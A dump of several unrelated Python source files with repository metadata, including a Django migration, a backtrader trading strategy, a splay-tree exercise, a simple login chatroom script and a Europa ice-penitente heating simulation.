if rl_isdir(d): P.append(d)
_setOpt(k,os.pathsep.join(P),lambda x:x.split(os.pathsep))
globals()[k] = list(filter(rl_isdir,globals()[k]))
else:
v = _SAVED[k]
if isinstance(v,(int,float)): conv = type(v)
elif k=='defaultPageSize': conv = lambda v,M=pagesizes: getattr(M,v)
else: conv = None
_setOpt(k,v,conv)
_registered_resets=[]
def register_reset(func):
'''register a function to be called by rl_config._reset'''
_registered_resets[:] = [x for x in _registered_resets if x()]
L = [x for x in _registered_resets if x() is func]
if L: return
from weakref import ref
_registered_resets.append(ref(func))
def _reset():
'''attempt to reset reportlab and friends'''
_startUp() #our reset
for f in _registered_resets[:]:
c = f()
if c:
c()
else:
_registered_resets.remove(f)
_startUp()
|
[
"[email protected]"
] | |
f9448cbb5289f3b55b21ec678cfe5a69529d926d
|
817f5b50ec1fa44c51ba657daea921bce80644a1
|
/blog/migrations/0002_auto_20200113_2245.py
|
fd56d81b4ae7a2e1f39796e6ebf756bf743b5c36
|
[] |
no_license
|
dejosli/ecommerce_pharmacy
|
94b002f25fd116db835bc5c028ee7458aab1dfb6
|
e0b30745f3777b83bcaea686cb46f66102394b42
|
refs/heads/master
| 2021-06-27T14:48:25.766224 | 2021-03-26T03:19:22 | 2021-03-26T03:19:22 | 225,802,123 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 413 |
py
|
# Generated by Django 2.2.5 on 2020-01-13 16:45
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='postcategory',
options={'ordering': ('name',), 'verbose_name': 'post_category', 'verbose_name_plural': 'post categories'},
),
]
|
[
"[email protected]"
] | |
6ac1325eae05a1491fc3ae51ea134cc72a1fddd0
|
0280fc1aa108b5d8cb73cdb67ba6293ee20d4435
|
/code/test_types/ensembles/get_best_ensemble_combination.py
|
1a934b10b0d67ac208a5f66cbabad8f5fa2b63d0
|
[] |
no_license
|
danielcomerio/2021-SBAI-Covid19_em_RaioX
|
bd8eee7e2c4f7052a5939ec7f1d6eeed0e459d74
|
90c981788c6c9b96e2cab15fd3de5c41a1024553
|
refs/heads/main
| 2023-08-02T15:06:26.831516 | 2021-10-02T23:24:37 | 2021-10-02T23:24:37 | 360,781,005 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,915 |
py
|
import argparse
import os
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix, precision_score, f1_score, recall_score, classification_report
from more_itertools import powerset
import random
models_path = [
"test_mobilenetNormal.txt",
"test_mobilenetProcessed.txt",
"test_resnetNormal.txt",
"test_resnetProcessed.txt",
"test_efficientnetNormal.txt",
"test_efficientnetProcessed.txt",
"test_inceptionNormal.txt",
"test_inceptionProcessed.txt",
]
def get_file_line_values(line):
line = line.strip().split(", ")
image = line[0].split('\\')[-1]
label = str(line[1])
predictions = []
for pos in range(2, len(line)):
predictions.append(float(line[pos]))
#predictions = np.argmax(predictions, axis=-1)
return image, label, predictions
def define_class_maximum(maximums, predicted_class):
if predicted_class[0] > maximums[0]:
maximums[0] = predicted_class[0]
if predicted_class[1] > maximums[1]:
maximums[1] = predicted_class[1]
if predicted_class[2] > maximums[2]:
maximums[2] = predicted_class[2]
return maximums
def define_class_vote(votes, predicted_class):
if str(predicted_class) == '0':
votes[0] = votes[0] + 1
elif str(predicted_class) == '1':
votes[1] = votes[1] + 1
else:
votes[2] = votes[2] + 1
return votes
def define_class_average(predictions_sum, predicted_class):
predictions_sum[0] += predicted_class[0]
predictions_sum[1] += predicted_class[1]
predictions_sum[2] += predicted_class[2]
return predictions_sum
def predictions_average(predictions_sum):
n_classes = int(len(predictions_sum))
for i in range(n_classes):
predictions_sum[i] = predictions_sum[i]/n_classes
return predictions_sum
def create_prediction_string(predicted_class):
predicted_string = ''
if str(predicted_class) == '0':
predicted_string = "1, 0, 0"
elif str(predicted_class) == '1':
predicted_string = "0, 1, 0"
else:
predicted_string = "0, 0, 1"
return predicted_string
def get_predicted_class(predicted_values):
predicted_class = np.argmax(predicted_values, axis=-1)
more_than_one = False
tied_classes = []
for pos in range(len(predicted_values)):
if predicted_values[pos] == predicted_values[predicted_class]:
tied_classes.append(pos)
more_than_one = True
if more_than_one:
predicted_class = random.choice(tied_classes)
return predicted_class
def get_metrics(file_path, best_accuracy):
file_metrics = open(file_path, "r")
#file_metrics.write("path_imagem, classe_real, classe_predita")
melhorou = False
label_list = []
predict_list = []
line = file_metrics.readline()
while line:
line = line.strip().split(", ")
label_list.append(line[1])
prediction = [float(line[2]), float(line[3]), float(line[4])]
prediction = np.argmax(prediction, axis=-1)
predict_list.append(str(prediction))
line = file_metrics.readline()
file_metrics.close()
accuracy = accuracy_score(label_list, predict_list)
if accuracy > best_accuracy:
best_accuracy = accuracy
melhorou = True
return best_accuracy, melhorou
def parse_command_line_args():
parser = argparse.ArgumentParser()
parser.add_argument("filespath", help="path to the dataset", type=str)
parser.add_argument("-me", "--metrics", type=str, default="metrics.txt")
args = parser.parse_args()
return args
# py get_best_ensemble_combination.py C:\Users\danie\Desktop\ArtigoDaniel\2021-SBAI-Covid19_em_RaioX\tests_results\files_results -me results.txt
# py ..\..\metrics.py -me C:\Users\danie\Desktop\ArtigoDaniel\2021-SBAI-Covid19_em_RaioX\code\test_types\ensembles\results.txt
def main():
args = parse_command_line_args()
BASE_PATH = args.filespath
best_accuracy = 0
best_combination = []
files_path = []
for model in models_path:
path = os.path.join(BASE_PATH, model)
files_path.append(path)
combination_list = list(powerset(files_path))[1:]
for combination in combination_list:
final_file = open(args.metrics, 'w')
comb = []
for model in combination:
comb.append(open(model, 'r'))
combination = comb
line = " "
while line != '':
predictions_sum = [0, 0, 0]
line = combination[0].readline()
if line == '':
break
image, label, prediction = get_file_line_values(line)
predictions_sum = define_class_average(predictions_sum, prediction)
for pos in range(1, len(combination)):
line = combination[pos].readline()
image_compare, _, prediction = get_file_line_values(line)
if image != image_compare:
raise Exception(
"Erro, ocorreu manipulação de imagens diferentes.")
predictions_sum = define_class_average(
predictions_sum, prediction)
image = image_compare
predictions_sum = predictions_average(predictions_sum) # -
predicted_class = get_predicted_class(predictions_sum)
prediction_string = create_prediction_string(predicted_class)
final_file.write(str(image) + ", " + str(label) +
", " + prediction_string + '\n')
for file in combination:
file.close()
final_file.close()
best_accuracy, melhorou = get_metrics(args.metrics, best_accuracy)
if melhorou:
best_combination = combination
print("accuracy_score:", best_accuracy)
print("best_combination:", best_combination)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
0587480993283923fc28a800af3f56fc5d43a1d5
|
34e3147447875b491bd1b50c915f8848ead80792
|
/uncertainty/constants.py
|
f19f8cdc91913b47521873fbed92985edbf59ce3
|
[
"MIT"
] |
permissive
|
meyersbs/uncertainty
|
680f275ded6aad63012a7ca781d1cf455c66f226
|
c12842cda7bea2d604bb9227a6c0baba9830b6fe
|
refs/heads/master
| 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 |
MIT
| 2023-07-07T18:17:09 | 2017-04-10T17:16:51 |
Python
|
UTF-8
|
Python
| false | false | 510 |
py
|
from pkg_resources import resource_filename
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
UNCERTAINTY_CLASS_MAP = {
'speculation_modal_probable_': 'E',
'speculation_hypo_doxastic _': 'D',
'speculation_hypo_condition _': 'N',
'speculation_hypo_investigation _': 'I',
'O': 'C'
}
|
[
"[email protected]"
] | |
6c937624bd73c970bb18a0b157447143bb654104
|
b5834420791b59e230593f7ef9cf8db0be410998
|
/main.py
|
2ddf96ce8f8c7081f8c3403ac6e26b98701e7f4e
|
[] |
no_license
|
mfatihdurmus/backtrader-test
|
f41f81f425c9b519d917388483d05db40af43c95
|
144c76a782b4044ca81d6097ee0ec975d9821fbc
|
refs/heads/main
| 2023-02-04T19:24:19.118104 | 2020-12-26T22:03:24 | 2020-12-26T22:03:24 | 324,636,259 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,305 |
py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import datetime # For datetime objects
import os.path # To manage paths
import sys # To find out the script name (in argv[0])
# Import the backtrader platform
import backtrader as bt
# Create a Stratey
class TestStrategy(bt.Strategy):
params = (
('maperiod', 15),
)
def log(self, txt, dt=None):
''' Logging function fot this strategy'''
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def __init__(self):
# Keep a reference to the "close" line in the data[0] dataseries
self.dataclose = self.datas[0].close
# To keep track of pending orders and buy price/commission
self.order = None
self.buyprice = None
self.buycomm = None
# Add a MovingAverageSimple indicator
self.sma = bt.indicators.SimpleMovingAverage(
self.datas[0], period=self.params.maperiod)
# Indicators for the plotting show
bt.indicators.ExponentialMovingAverage(self.datas[0], period=25)
bt.indicators.WeightedMovingAverage(self.datas[0], period=25,
subplot=True)
bt.indicators.StochasticSlow(self.datas[0])
bt.indicators.MACDHisto(self.datas[0])
rsi = bt.indicators.RSI(self.datas[0])
bt.indicators.SmoothedMovingAverage(rsi, period=10)
bt.indicators.ATR(self.datas[0], plot=False)
def notify_order(self, order):
if order.status in [order.Submitted, order.Accepted]:
# Buy/Sell order submitted/accepted to/by broker - Nothing to do
return
# Check if an order has been completed
# Attention: broker could reject order if not enough cash
if order.status in [order.Completed]:
if order.isbuy():
self.log(
'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %
(order.executed.price,
order.executed.value,
order.executed.comm))
self.buyprice = order.executed.price
self.buycomm = order.executed.comm
else: # Sell
self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %
(order.executed.price,
order.executed.value,
order.executed.comm))
self.bar_executed = len(self)
elif order.status in [order.Canceled, order.Margin, order.Rejected]:
self.log('Order Canceled/Margin/Rejected')
# Write down: no pending order
self.order = None
def notify_trade(self, trade):
if not trade.isclosed:
return
self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %
(trade.pnl, trade.pnlcomm))
def next(self):
# Simply log the closing price of the series from the reference
self.log('Close, %.2f' % self.dataclose[0])
# Check if an order is pending ... if yes, we cannot send a 2nd one
if self.order:
return
# Check if we are in the market
if not self.position:
# Not yet ... we MIGHT BUY if ...
if self.dataclose[0] > self.sma[0]:
# BUY, BUY, BUY!!! (with all possible default parameters)
self.log('BUY CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.buy()
else:
if self.dataclose[0] < self.sma[0]:
# SELL, SELL, SELL!!! (with all possible default parameters)
self.log('SELL CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.sell()
if __name__ == '__main__':
# Create a cerebro entity
cerebro = bt.Cerebro()
# Add a strategy
cerebro.addstrategy(TestStrategy)
# Datas are in a subfolder of the samples. Need to find where the script is
# because it could have been called from anywhere
modpath = os.path.dirname(os.path.abspath(sys.argv[0]))
datapath = os.path.join(modpath, 'datas/orcl-1995-2014.txt')
# Create a Data Feed
data = bt.feeds.YahooFinanceCSVData(
dataname=datapath,
# Do not pass values before this date
fromdate=datetime.datetime(2000, 1, 1),
# Do not pass values before this date
todate=datetime.datetime(2000, 12, 31),
# Do not pass values after this date
reverse=False)
# Add the Data Feed to Cerebro
cerebro.adddata(data)
# Set our desired cash start
cerebro.broker.setcash(1000.0)
# Add a FixedSize sizer according to the stake
cerebro.addsizer(bt.sizers.FixedSize, stake=10)
# Set the commission
cerebro.broker.setcommission(commission=0.0)
# Print out the starting conditions
print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Run over everything
cerebro.run()
# Print out the final result
print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Plot the result
cerebro.plot()
|
[
"[email protected]"
] | |
ad526b0c77d1f2680d586cca25c56ab1a9511e1d
|
6bf1bb4922d5746d2893f9bc09a41dca67872d4e
|
/chatroom_encryption.py
|
018ab46bdbf723ce2b5fb8458d1f3df4019d5c07
|
[] |
no_license
|
ivarols/Login-screen-to-chatroom
|
18b051edc48da243438ce5371513d41ab09bd6cb
|
5e745901c60f67a7aef9b8b64a374a4a51e457d7
|
refs/heads/main
| 2023-03-26T07:12:41.109236 | 2021-03-12T17:09:24 | 2021-03-12T17:09:24 | 345,217,844 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,527 |
py
|
# import encyption_function_for_chatroom.py from whatever directery you have it stored
def register():
print("Registration")
password_r = ""
username_r = input("Enter username: ")
username_split_r = len(username_r.split())
if username_split_r > 1:
print("No blank spaces within the username.")
return register()
elif username_split_r < 1:
print("No username entered.")
return register()
else:
reg_completion = False
with open('#incert .txt-file-name-here#', 'r') as register_r:
for line in register_r:
user_info_list = line.split()
if len(user_info_list) > 0:
if user_info_list[0] == username_r:
print("Username already taken.")
return register()
while not reg_completion:
password_r = input("Enter password: ")
password_split_r = username_r.split()
words_r = space_control(password_split_r)
for char in password_r:
if char not in encryption_function_for_chatroom.accessable_digits:
print("Password conatians illega charachters.")
return register()
if words_r > 1:
print("No black spaces within the password.")
return register()
elif words_r < 1:
print("No password entered.")
return register()
elif len(password_r) < 7:
print("Password is too short.")
return register()
else:
reg_completion = True
with open('#incert .txt-file-name-here#', 'a') as register_r:
password_r, access_key2 = encryption_function_for_chatroom.password_encryption(password_r)
print(f'Your login-info access-key is: {access_key2}')
register_r.write(f'{username_r} {password_r}\n')
register_r.close()
def login():
username_l = input("Enter username: ")
password_l = input("Enter password: ")
access = False
for char in password_l:
if char not in encryption_function_for_chatroom.accessable_digits:
print("Username or password is incorrect.")
return access
with open('#incert .txt-file-name-here#', 'r') as login_info:
for line in login_info:
login_info_list = line.split()
if len(login_info_list) > 0:
if login_info_list[0] == username_l and login_info_list[1] == encryption_function_for_chatroom.password_encryption(password_l):
access = True
login_info.close()
if access:
return username_l
else:
print("Username or password is incorrect.")
return access
def get_login_info():
username = input("Enter username: ")
access_key = input("Enter accesskey: ")
password_key = encryption_function_for_chatroom.key_decrypter(access_key)
if len(password_key) != 3:
print("Invalid access_key")
return get_login_info()
elif not password_key[0].isdigit() or not password_key[1].isdigit():
print("Invalid access_key")
return get_login_info()
elif password_key[2] != ".":
print("Invalid access_key")
return get_login_info()
with open('#incert .txt-file-name-here#', 'r') as login_info:
for line in login_info:
login_info_list = line.split()
if len(login_info_list) > 0:
if login_info_list[0] == username:
password_decypted = encryption_function_for_chatroom.message_decryption(login_info_list[1], password_key)
return password_decypted
def chatroom(username_c):
message_c = input("> ")
if message_c == "_logout":
return False
else:
emoji_converted_message_c = emoji_converter(message_c)
print(f'{username_c}: {emoji_converted_message_c}')
return chatroom(username_c)
def emoji_converter(message_ec):
words_ec = message_ec.split()
emoji_ec = {
":)": "😀",
":(": "🙁",
"B)": "😎",
":p": "😜",
";)": "😉"
}
output_ec = ""
for word_controll_ec in words_ec:
output_ec += emoji_ec.get(word_controll_ec, word_controll_ec) + " "
return output_ec
def space_control(username_sc):
words_sc = 0
for word_sc in username_sc:
words_sc += 1
return words_sc
def greeting(username_g):
print(f'Welcome, {username_g}!')
print("You can now chat.")
print("Exit chat by typing '_logout'.")
program_running = True
while program_running:
print("Enter: 'login' to log in.")
print("Enter: 'reg' to register.")
print("Enter: 'forgot_password' to obtain password.")
action = input("Log in or register: ")
counter = 0
if action == "login":
print("Login")
username = login()
if username != False:
greeting(username)
running_chat = chatroom(username)
if running_chat == False:
print("Chat have been exited and you have been logged out.")
elif action == "forgot_password":
password = get_login_info()
if password is None:
print("Invalid access_key or username")
else:
print(f'password: {password}')
elif action == "reg":
register()
elif action == "exit":
print("You have exited the program.")
program_running = False
|
[
"[email protected]"
] | |
f0277517a0c493c33d30df57e6b7bf5cd604f4ff
|
2f176eafaa23e4dcf7309b4b1c751728de6d9a8b
|
/parsing4.py
|
150d77da6090b97bc33c9fb753e5712d3d3f1948
|
[] |
no_license
|
aahnn1223/python_study
|
2586eae3a79a4bb1039a8503582a6fba21acc3c5
|
355a23609128ef1584d1273379c1f16a6e646316
|
refs/heads/master
| 2021-05-15T03:15:57.150379 | 2020-03-30T00:59:46 | 2020-03-30T00:59:46 | 250,404,701 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 291 |
py
|
## read로 불러올 때에는 바이너리 형태로 불러오기 때문에 우리가 읽기 어렵다.
import urllib.request
url="http://example.com/"
res = urllib.request.urlopen(url)
data = res.read()
#바이너리를 문자열로 변환하기
text = data.decode("utf-8")
print(text)
|
[
"[email protected]"
] | |
35e0f155082e64c88bf8b1155a6da2dc8d25fc31
|
447b17ac1893d5e09cbce365761ded8b61f33956
|
/ifs/filesystem/models.py
|
a619dea66a2168c89927e483b9b4e106731382b6
|
[] |
no_license
|
yulkes/workshop-sample-solution
|
eb69a3e7bb3e7056321348c1c6eee5d309a18411
|
0fc6378c31e329dca85041df6063ac2ce835c720
|
refs/heads/main
| 2023-05-24T21:22:04.129446 | 2020-07-24T15:00:30 | 2020-07-24T15:00:30 | 280,848,181 | 1 | 0 | null | 2023-05-23T00:11:33 | 2020-07-19T11:07:47 |
Python
|
UTF-8
|
Python
| false | false | 1,188 |
py
|
from dataclasses import dataclass, field
from logging import Logger
from pathlib import Path
from typing import List
logger = Logger(__name__)
@dataclass
class DirectoryListing:
base_path: Path
files: List[Path] = field(default_factory=list)
dirs: List[Path] = field(default_factory=list)
def add_file(self, path: Path):
if path.is_dir():
self.dirs.append(path)
elif path.is_file():
self.files.append(path)
else:
# We ignore other types of files
pass
def to_dict(self):
"""
Make it easier to render this object as JSON later on.
Can be extracted to a standalone JSON converter.
:return:
"""
return {
"filename": str(self.base_path),
"dirs": [str(directory.name) for directory in self.dirs],
"files": [str(f.name) for f in self.files],
}
def __bool__(self):
return bool(self.files or self.dirs)
@dataclass
class DirListingRequest:
base_path: Path
@dataclass
class DeleteFileRequest:
file_path: Path
@dataclass
class RenameFileRequest:
old_path: Path
new_path: Path
|
[
"[email protected]"
] | |
a93c88113c884a9df489879c2717ce2816a0ac34
|
472bd1a9bff63576cf6ce8813a569f350b550645
|
/getdata/migrations/0001_initial.py
|
23312910b5a76bcb40c7f809ffc2e403c5ef2f09
|
[] |
no_license
|
karankwatra/chicago_data_sources
|
f6dad59c6acedff0a760aa2011f7638ddf0cdfb1
|
ae8a25bb7727ba3720c72444ddaab753206332ee
|
refs/heads/master
| 2021-05-09T20:54:33.047806 | 2018-02-17T08:09:41 | 2018-02-17T08:09:41 | 118,713,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
# Generated by Django 2.0.1 on 2018-01-24 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
]
|
[
"[email protected]"
] | |
ebbf372f122d1b3b4628688630c2a22d58f2bfa0
|
15f647b8cf73c283b1491a259087a0ab209b70ba
|
/relation_detection/relation-evaluator.py
|
1fe528a7de37070eb4d50c7767865100c3ae0b63
|
[] |
no_license
|
shen1993/relation-detection
|
8c2e17106b3db6dd4146747da2f7c6ee2d619c10
|
8dd315a280101a922c41f01292995a87778327a4
|
refs/heads/master
| 2020-06-01T06:14:35.043727 | 2019-06-07T01:51:25 | 2019-06-07T01:51:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,344 |
py
|
#!/usr/bin/python
#compute the accuracy of an NE tagger
#usage: evaluate-head.py [gold_file][output_file]
import sys, re
if len(sys.argv) != 3:
sys.exit("usage: evaluate-head.py [gold_file][output_file]")
#gold standard file
goldfh = open(sys.argv[1], 'r')
#system output
testfh = open(sys.argv[2], 'r')
gold_tag_list = []
#gold_word_list = []
test_tag_list = []
emptyline_pattern = re.compile(r'^\s*$')
for gline in goldfh.readlines():
if not emptyline_pattern.match(gline):
parts = gline.split()
#print parts
gold_tag_list.append(parts[0])
for tline in testfh.readlines():
if not emptyline_pattern.match(tline):
parts = tline.split()
#print parts
test_tag_list.append(parts[0])
test_total = 0
gold_total = 0
correct = 0
#print gold_tag_list
#print test_tag_list
for i in range(len(gold_tag_list)):
if gold_tag_list[i] != 'no_rel':
gold_total += 1
if test_tag_list[i] != 'no_rel':
test_total += 1
if gold_tag_list[i] != 'no_rel' and gold_tag_list[i] == test_tag_list[i]:
correct += 1
precision = float(correct) / test_total
recall = float(correct) / gold_total
f = precision * recall * 2 / (precision + recall)
#print correct, gold_total, test_total
print ('precision =', precision, 'recall =', recall, 'f1 =', f)
|
[
"[email protected]"
] | |
6757f60ad54e92de598316caec907e610dd16c53
|
e01c5d1ee81cc4104b248be375e93ae29c4b3572
|
/Sequence4/DS/Week5/submission/sub-range-4.py
|
585c33c2a3133ca7749fcb1568e035d6b909e7e3
|
[] |
no_license
|
lalitzz/DS
|
7de54281a34814601f26ee826c722d123ee8bd99
|
66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1
|
refs/heads/master
| 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,351 |
py
|
# python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
def __init__(self, key, sum, left, right, parent):
(self.key, self.sum, self.left, self.right, self.parent) = (key, sum, left, right, parent)
class SplayTree:
def update(self, v):
if v == None:
return
v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
if v.left != None:
v.left.parent = v
if v.right != None:
v.right.parent = v
def smallRotation(self, v):
parent = v.parent
if parent == None:
return
grandparent = v.parent.parent
if parent.left == v:
m = v.right
v.right = parent
parent.left = m
else:
m = v.left
v.left = parent
parent.right = m
self.update(parent)
self.update(v)
v.parent = grandparent
if grandparent != None:
if grandparent.left == parent:
grandparent.left = v
else:
grandparent.right = v
def bigRotation(self, v):
if v.parent.left == v and v.parent.parent.left == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
elif v.parent.right == v and v.parent.parent.right == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
else:
# Zig-zag
self.smallRotation(v)
self.smallRotation(v)
# Makes splay of the given vertex and makes
# it the new root.
def splay(self, v):
if v == None:
return None
while v.parent != None:
if v.parent.parent == None:
self.smallRotation(v)
break
self.bigRotation(v)
return v
# Searches for the given key in the tree with the given root
# and calls splay for the deepest visited node after that.
# Returns pair of the result and the new root.
# If found, result is a pointer to the node with the given key.
# Otherwise, result is a pointer to the node with the smallest
# bigger key (next value in the order).
# If the key is bigger than all keys in the tree,
# then result is None.
def find(self, root, key):
v = root
last = root
next = None
while v != None:
if v.key >= key and (next == None or v.key < next.key):
next = v
last = v
if v.key == key:
break
if v.key < key:
v = v.right
else:
v = v.left
root = self.splay(last)
return (next, root)
def split(self, root, key):
(result, root) = self.find(root, key)
if result == None:
return (root, None)
right = self.splay(result)
left = right.left
right.left = None
if left != None:
left.parent = None
self.update(left)
self.update(right)
return (left, right)
def merge(self, left, right):
if left == None:
return right
if right == None:
return left
while right.left != None:
right = right.left
right = self.splay(right)
right.left = left
self.update(right)
return right
class SetRange:
# Code that uses splay tree to solve the problem
root = None
S = SplayTree()
def insert(self, x):
(left, right) = self.S.split(self.root, x)
new_vertex = None
if right == None or right.key != x:
new_vertex = Vertex(x, x, None, None, None)
self.root = self.S.merge(self.S.merge(left, new_vertex), right)
def erase(self, x):
if self.search(x) is None:
return
self.S.splay(self.root)
self.root = self.S.merge(self.root.left, self.root.right)
if self.root is not None:
self.root.parent = None
def search(self, x):
# Implement find yourself
result, self.root = self.S.find(self.root, x)
if result is None or self.root.key != x:
return None
return result.key
def sum(self, fr, to):
(left, middle) = self.S.split(self.root, fr)
(middle, right) = self.S.split(middle, to + 1)
ans = 0
# Complete the implementation of sum
if middle is None:
ans = 0
self.root = self.S.merge(left, right)
else:
ans = middle.sum
self.root = self.S.merge(self.S.merge(left, middle), right)
return ans
def get_tree(self):
print(self.root.key)
self._get_tree(self.root)
def _get_tree(self, root):
if root:
self._get_tree(root.left)
print(root.key)
self._get_tree(root.right)
def main():
MODULO = 1000000001
n = int(stdin.readline())
last_sum_result = 0
s = SetRange()
for i in range(n):
line = stdin.readline().split()
if line[0] == '+':
x = int(line[1])
s.insert((x + last_sum_result) % MODULO)
elif line[0] == '-':
x = int(line[1])
s.erase((x + last_sum_result) % MODULO)
elif line[0] == '?':
x = int(line[1])
print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
elif line[0] == 's':
l = int(line[1])
r = int(line[2])
res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
print(res)
last_sum_result = res % MODULO
elif line[0] == 'c':
s.get_tree()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
0f18188c5e6dd84f4318dceee1a28bd84ad64df4
|
94efec085757ca8a1956e6a0b6cb93cac792e522
|
/cathles_bounce_heating.py
|
c64a87a577e1afa5db82cfbd02ad883ceabdc134
|
[] |
no_license
|
SiccarPoint/penitentes
|
327845a37b03351c0ef504907833268fce51545b
|
7b720aeaf157b5dc471975c80ba99840224e19bd
|
refs/heads/master
| 2021-01-10T15:41:38.572631 | 2015-10-01T01:39:12 | 2015-10-01T01:39:12 | 43,472,662 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 25,780 |
py
|
# this code follows Cathles et al., 2014, and whence Cathles et al., 2011,
# for its approach
# This iteration of this code attempts to allow the surface to be cooler than
# the melting pt, which is explicitly assumed by Cathles. We need to thus add
# reradiation, temp changes, and a sublimation rate which is dependent on T,
# not the radiative flux itself (i.e., adopt the original Hobley (in prep.)
# method, following Lebovsky).
import numpy as np
from pylab import plot, figure, show
import scipy.interpolate as interp
true_albedo = 0.55 # Jeff's bolometric albedo
ice_density = 494. # check these data
L_subl = 51000./0.018 # J/mol / kg/mol,
# the change enthalpy of sublimation div by molecular weight
true_incoming_intensity = 50. # 50 Wm**-2
#
sun_declination = 0. # orbital locking
latitude = 0. # equator for now
emissivity = 0.9 # Jeff gives 0.9, 0.97 is standard ice
stefan_boltz = 5.670373e-8
thermal_cond = 4.2 # W/m/K ...bit of a guess at low T
## NB - Jeff's best fit gives conductivity*specific heat = 10
# assuming the SHC is solid-ish (as it scales to mass, so porosity already in):
# thermal_cond *~ 0.05
# let's assume this!!
thermal_cond *= 0.05 ####
#thermal_cond = 0.01 # ...if shc ~1000 (18/0.018)
# a conservative end member approach would be to share the fraction equally...
#note both thermal_cond & shc * 0.05 makes their product 10.
mobile_pts = False # always leave this set to True!!
temp_pts = np.array([73.,93.,113.,133.,173.]) # temperatures in K for shc
shc = np.array([12.2,15.,17.3,19.8,24.8])/0.018 #specific heat capacity in J/kg/K
shc *= 0.05 ####
diffusivities = thermal_cond/ice_density/shc
initial_T = 106. # coldest nighttime Ts at the equator are 90; NEVER below 73.
# this is Jeff's mean T
coldest_diffusivity = np.interp(initial_T, temp_pts, diffusivities)
num_pts = 50 # 100
pt_spacing = 0.02 # 0.01
num_sinusoids = 1
amplitude = 1.*num_pts*pt_spacing/num_sinusoids # per Cathles
array_length = num_pts*pt_spacing # note we incorporate the final segment
# array_length is only the x dimension
tstep = 60.*60.*24.*365.*1. # an earth year, in earth secs (1/3.55 Eudays)
tstep = 400.
num_tsteps = 1000 # 10000
num_tsteps = 800 # a little after midday
# initialize them as a flat surface
node_x = np.arange(num_pts, dtype=float)*pt_spacing
node_z = np.zeros(num_pts, dtype=float) + np.random.rand(num_pts)/10.
# node_z[::2] = -0.1
# Cathles uses a sinusoid...
node_z = amplitude/2.*np.sin(node_x/array_length*2.*np.pi*num_sinusoids)
node_z.fill(0.)
# this version of the code tries to model a single day on europa.
# our day will start at 6am, the coldest time
a_europa_day = 60.*60.*24.*3.55 # in secs
def get_hour_angle(time_elapsed):
# the clock starts at dawn
fraction_of_day = (time_elapsed/a_europa_day)%1.
if 0. <= fraction_of_day < 0.5:
hour_angle = np.arcsin(4.*fraction_of_day-1.)
else:
hour_angle = None #nighttime
return hour_angle
# node_z[2] -= 1
# ^flat, with noise
num_segments = num_pts
# save the init conds:
init_node_x = node_x.copy()
init_node_z = node_z.copy()
node_x_exp = np.empty(num_pts*3, dtype=float)
node_z_exp = np.empty(num_pts*3, dtype=float)
node_x_exp[num_pts:(2*num_pts)] = node_x
node_x_exp[:num_pts] = node_x - array_length
node_x_exp[(2*num_pts):] = node_x + array_length
node_z_exp[num_pts:(2*num_pts)] = node_z
node_z_exp[:num_pts] = node_z
node_z_exp[(2*num_pts):] = node_z
seg_dx = np.empty(num_pts*3-1, dtype=float)
seg_dz = np.empty_like(seg_dx)
seg_centx = np.empty_like(seg_dx)
seg_centz = np.empty_like(seg_dx)
seg_length = np.empty_like(seg_dx)
seg_angle = np.empty_like(seg_dx)
seg_m = np.empty_like(seg_dx)
seg_c = np.empty_like(seg_dx)
new_contour_cumlen = np.zeros(num_pts+1, dtype=float)
new_lengths = np.zeros(num_pts+1, dtype=float)
deepest_elev = np.empty(num_tsteps, dtype=float) # this stores the pit depths
num_section_pts = 40
seg_section_T = np.empty((num_pts*3-1, num_section_pts), dtype=float)
# ^this is a section down into each seg, used for transient T calcs
seg_section_T.fill(initial_T)
